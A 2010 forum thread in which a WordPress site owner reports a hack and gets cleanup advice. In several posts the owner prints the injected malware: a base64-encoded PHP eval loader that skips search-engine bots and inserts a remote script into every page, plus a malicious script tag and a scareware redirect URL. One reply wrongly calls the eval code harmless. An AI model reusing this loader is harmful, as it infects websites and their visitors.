1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Wordpress Site Hacked - Please HELP !!!

Discussion in 'Databases' started by Hema Latha, Apr 15, 2010.

  1. #1
    Both wp-adin/dashboard and my site is getting redirected to:

    1. http://www.bing.com/search?q=freevirusscan&go=&form=QBRE&filt=all
    2. http://scaner24.org/?affid=318&subid=landing

    Today, 04/14/2010 i logged into dashboard and it was crashed.
    I tried to refresh many a times and it still was crashed,
    and i saw this address running fast in the Task Bar:

    http://kdjkfjskdfjlskdjf.com

    After sometime the dashboard started redirecting to bing.com mentioned above.

    Changes i did today:

    1. Uninstalled wp-united.
    2. Uninstalled Phpbb.
    3. Installed Beeline wp plugin.
    4. INSTALLED wp plugin Tal.Ki (Tal.ki Embeddable Forums)

    I came to know my site has been HACKED and googled few solutions.

    1. Changed Wp Admin Password.
    2. Changed FTP Password.
    3. Saw this code in Page Source:

    Code (Text):
    1. <script type='text/javascript'>
    2. /* <![CDATA[ */
    3. var thickboxL10n = {
    4.     next: "Next &gt;",
    5.     prev: "&lt; Prev",
    6.     image: "Image",
    7.     of: "of",
    8.     close: "Close"
    9. };
    10. try{convertEntities(thickboxL10n);}catch(e){};
    11. var commonL10n = {
    12.     warnDelete: "You are about to permanently delete the selected items.\n  \'Cancel\' to stop, \'OK\' to delete."
    13. };
    14. try{convertEntities(commonL10n);}catch(e){};
    15. var wpAjax = {
    16.     noPerm: "You do not have permission to do that.",
    17.     broken: "An unidentified error has occurred."
    18. };
    19. try{convertEntities(wpAjax);}catch(e){};
    20. var adminCommentsL10n = {
    21.     hotkeys_highlight_first: "",
    22.     hotkeys_highlight_last: ""
    23. };
    24. var plugininstallL10n = {
    25.     plugin_information: "Plugin Information:"
    26. };
    27. try{convertEntities(plugininstallL10n);}catch(e){};
    28. /* ]]> */
    29. </script>
    30. <script type='text/javascript' src='http://indiangirlsclub.com/wp-admin/load-scripts.php?c=1&amp;load=thickbox,hoverIntent,common,jquery-color,jquery-ui-core,jquery-ui-sortable,wp-ajax-response,wp-lists,jquery-ui-resizable,admin-comments,postbox,dashboard,plugin-install,media-upload&amp;ver=b92e060c1632e7b2fe6ec9809056c0d0'></script>
    31.  
    32. <script type="text/javascript">if(typeof wpOnload=='function')wpOnload();</script>
    33. <script src="http://kdjkfjskdfjlskdjf.com/js.php"></script>


    5. Removed this code from Index.php and Load-Scripts.php :

    Code (Text):
    1. <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5clpHcHJabXB6YTJSbWFteHphMlJxWmk1amIyMHZhbk11Y0dod0lqNDhMM05qY21sd2REND0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>

    6. Uninstalled Tal.Ki Plugin.



    Still my site is not clean.

    It's getting redirected to :

    1. http://www.bing.com/search?q=freevirusscan&go=&form=QBRE&filt=all
    2. http://scaner24.org/?affid=318&subid=landing

    Site Url: http://indiangirlsclub.com
    Please HELP me. I'm not a tech savvy. What else should i do ???
    Hema Latha, Apr 15, 2010 IP
  2. noobbgodlike

    noobbgodlike Peon

    Messages:
    63
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #2
    which hosting service you use?? contact them and tell them your problem. If hostgator you can easily contact them by live chat, i don't know about hosting provider though.
    hope it helps
    noobbgodlike, Apr 15, 2010 IP
  3. Hema Latha

    Hema Latha Peon

    Messages:
    18
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #3
    Thank you noobbgodlike.

    I'm using Godaddy. I will contact them immediately.

    I found that the eval base code 64 is present all over the php files. Manually i have started to delete the codes now.

    Is there anything else i have to follow, so that this never happens in future?

    Thanks for the help.
    Hema Latha, Apr 15, 2010 IP
  4. noobbgodlike

    noobbgodlike Peon

    Messages:
    63
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #4
    you are welcome just careful enter your password (phising or etc) if you register in new site use fake password for a while after you know it is real or good change the password. I don;t know about any method beside that because i am just newbie too LOL.
    noobbgodlike, Apr 15, 2010 IP
  5. Hema Latha

    Hema Latha Peon

    Messages:
    18
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #5
    Unable to delete the "eval base 64" code as it is present throughout the FTP folders in php files.

    It's impossible to edit each and every php file.

    I have contacted Godaddy and waiting for their reply.

    Any fix to delete the codes ???
    Hema Latha, Apr 15, 2010 IP
  6. Objects

    Objects Active Member

    Messages:
    388
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    90
    #6
    1- take wp-content folder on your local machine

    2- remove all files

    3- install fresh new copy of wordpress latest version

    4- use same database setting of your old site

    5- try to clean your theme manually if its custom one

    6- get new versions of your current active plugins and add them in plugin folder

    7- change wp admin password
    Objects, Apr 15, 2010 IP
  7. Hema Latha

    Hema Latha Peon

    Messages:
    18
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #7
    @ oneahmed,

    My problem is getting more complex.

    It's just not only the Wordpress ... I also have topsites directory, 4images, Another Wordpress with Buddypress installed in the root.

    I have removed the codes from admin, content and includes manually.

    Unable to Login to Dashboard as it immediately redirects to some other website.

    I'm still wondering how my site was hacked !!!!!!!!!

    I hope Godaddy can fix it.

    Thanks oneahmed.
    Hema Latha, Apr 15, 2010 IP
  8. dpmaster72

    dpmaster72 Peon

    Messages:
    65
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #8
    I am also in the same boat. Did anyone find a solution ?
    dpmaster72, Apr 17, 2010 IP
  9. Hema Latha

    Hema Latha Peon

    Messages:
    18
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #9
    @ dpmaster72 ...

    I deleted all the wp files, wp plugins and replaced it.
    I'm running the latest version of wordpress but still my site was hacked.

    Afraid again my blog would be hacked, coz i'm not familiar with Database and the Backdoors.
    But have changed the passwords for user, database and FTP.

    Googling revealed that most of the blogs hacked were in Godaddy Shared Hosting Server.

    Here is the reply we got from Godaddy support:

    I'm helpless !!!!!!!!!!!!!!!!!!!!

    Deleted 4images, Topsites and Worpress with Buddypress. (I have spent so many hours and hardwork to create, customize and promote).
    Last edited: Apr 17, 2010
    Hema Latha, Apr 17, 2010 IP
  10. c4gamerz

    c4gamerz Active Member

    Messages:
    294
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    60
    #10
    Hi,

    It looks like hacker has tempered your wordpress database as well. If possible send me database through pm i will check it out. Or just give me access to your cpanel i will see what i can do for you.

    Regards,
    Arshad
    c4gamerz, Apr 17, 2010 IP
  11. Hema Latha

    Hema Latha Peon

    Messages:
    18
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #11
    I have installed Wordpress Firewall Plugin.

    My email is dumped in few minutes with 129 Alert Messages from IP: 202.69.200.5 Sri Lanka, Western, Wattala

    and 2 Alert Messages from New Delhi, India and 2 Alert Messages from MY IP Address.

    I checked the ".jpg" file and it's ok just an image.
    The offending parameter is from Google Images !!!!

    Is this ok, can i neglect this Alert ???
    Hema Latha, Apr 17, 2010 IP
  12. Hema Latha

    Hema Latha Peon

    Messages:
    18
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #12
    Now, i'm unable to view my blog.

    Got this message:
    After refreshing the browser so many times, Got this message:


    And again more 239 Alert Emails From Wordpress Firewall, But this time it's stating my Ip address in all the emails.
    Hema Latha, Apr 17, 2010 IP
  13. reapr

    reapr Peon

    Messages:
    1,712
    Likes Received:
    18
    Best Answers:
    0
    Trophy Points:
    0
    #13
    I had 16 hacked WP sites to contend with last year. Still unclear how it happened but since then the host has tightened security ... humm.

    Anyhow most my files infected were index.htm or index.html or those two files were created in each folder!

    There were many other php files infected. You may want to check your database they could have done and injection of sorts. One thing that was common was was 2 URLS in the code and appeared to running a counter/clicker script of sorts. So if this sounds like a similar situation I may be able to help.
    reapr, Apr 17, 2010 IP
  14. sushie

    sushie Peon

    Messages:
    228
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #14
    Do you have a fresh copy of your Wordpress in your computer?
    If yes, try to reinstall all...
    The eva code is not a virus, there are many reasons why it is here, myself, my wordpress have this eva code and it just a code to run wordpress normally.
    Try to find the "virus code" in your wordpress files, if you have a copy of it in your computer, view them both to see if any code have change if you see a odd code, remove it, change your files permissions (chmod) to 755.
    I remember when my wordpress got hacke, i had always a pop up who come in my website, it was because i modify the chmode to 777.
    So i install a wordpress plugin: Exploit Scan to see what files was installed and i see that there was some odd code in my themes files, so i remove all the themes and change for a new and then, all work perfectly.
    sushie, Apr 17, 2010 IP
  15. kishor212

    kishor212 Guest

    Messages:
    124
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #15
    I can Help You Bro..!

    Give me Access to your Cpanel.. and i can make it alright...!

    Or Even You can Do It..!
    Save all the databases needed..! and Reinstall the scripts with fresh copies..! DOne..!

    PM me if you want me to do it..!
    kishor212, Apr 17, 2010 IP
  16. Steupz

    Steupz Peon

    Messages:
    918
    Likes Received:
    10
    Best Answers:
    0
    Trophy Points:
    0
    #16
    This has happened to me 4 times; 4 times!!!

    On each occasion I deleted all my wordpress files and reinstalled wordpress and reinstalled all my plugins.

    I have no idea why it recurs, but it's not a coincidence that I use two hosting packages for two sites and it only happens with the godaddy hosting
    Steupz, Apr 17, 2010 IP
  17. rockyg

    rockyg Peon

    Messages:
    231
    Likes Received:
    8
    Best Answers:
    0
    Trophy Points:
    0
    #17
    Highly likely you have a vulnerabilty in one of your scripts. I doubt sincerely its the wordpress script itself, more likely a wordpress plugin or another of your website scripts is allowing a hacker in - and then through to all your websites because of your server settings (i.e. user 'apache' can write to all website files) so look at the other sites you have on your server too.

    Two things:
    1. Check your .htacess files for redirect codes. This may be the cause of your redirects.
    2. You will have to replace your website files with either backups or upgrades. If you do not have backups or cannot find original files then yes, you do have to manually go through each file and clean it but....

    there is no point cleaning all the files or replacing files if you do not close of the security flaw you have. All the hacker needs do is wash, rinse and repeat his actions and then you must clean,wash, rinse and repeat yours.

    You MUST find the hole!

    If you are using Hostgator its unlikely that it was their fault, more likely it was vulnerability in your scripts. What I mean is that it is unlikely that hostgator itself was hack simply to get to your account. More likely that either your server setup is flawed (if you set up the server yourself) and if you are on a shared server than its odds on money its one of the website scripts/ website extensions/plugins that are at fault.

    First step is your logs. If you have access to your sever security log, look for successful logins other than yours.
    Check your website logs looking for strange url requests that look out of place. Sometimes these strange url requrests can even be spotted just by browsing through your url requests in statcounter.

    Enter the name of your website scripts into Google with the tag 'security warning' or 'vulnerabilty' to see what comes up. Ensure you close off any flaws that you find. Do this for your wordpress plugins also.
    2. If you are have set up an email server, shut it down for the moment. Its another great way to get into a server if not set up properly.

    Good luck!
    rockyg, Apr 17, 2010 IP
  18. Nick_Mayhem

    Nick_Mayhem Notable Member

    Messages:
    3,468
    Likes Received:
    335
    Best Answers:
    0
    Trophy Points:
    240
    #18
    I use godaddy hosting and my forum was also hacked.

    It isn't just WP that is being hacked.
    Nick_Mayhem, Apr 18, 2010 IP
  19. Hema Latha

    Hema Latha Peon

    Messages:
    18
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #19
    My blog is hacked again.
    I have cleared everything and changed the passwords, installed security plugins. But now my site is hacked again.

    It's again has the same script in the Page Source:

    Code (Text):
    1. <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>
    And my antivirus program has blocked my site and giving an Alert.
    Site is getting redirected to the below link.

    Code (Text):
    1. http:// www1.protectsys28-pd.xorg.pl/?p=p52dcWpkbG6HjsbIo216h3de0KCfYWCcU9LXoKitioaLw8ydb5aYen5arK3NasiXk2Rea2JrmV2ZVqPajtfZ1m5do3OL1cytnpl2Wp6dpJ6eU9rPlqdqWpuooV6UYl6XY5eSlWVsYGiYk4mrl5p2nKyoqHOQXM3UlZmOopmh1pnVk5zbj5HH0p5mWKrYnpRraWZwaGhlaHCHodeYbmFfa2RvmF2TYGeMkMahrH9dqZ%2FJnptyag%3D%3D
    All the php files have this code on the first line:
    Code (Text):
    1. <?php /**/eval(base64_decode (" aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5clpHcHJabXB6YTJSbWFteHphMlJxWmk1amIyMHZhM0F1Y0dod0lqNDhMM05qY21sd2REND0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
    I feel to Quit blogging.
    Hema Latha, May 1, 2010 IP
  20. Blue Star Ent.

    Blue Star Ent. Well-Known Member

    Messages:
    1,944
    Likes Received:
    28
    Best Answers:
    0
    Trophy Points:
    110
    #20
    Is the computer you use to access your site clean ? Some people can have malware on their own computer that does damage to other sites.
    Blue Star Ent., May 1, 2010 IP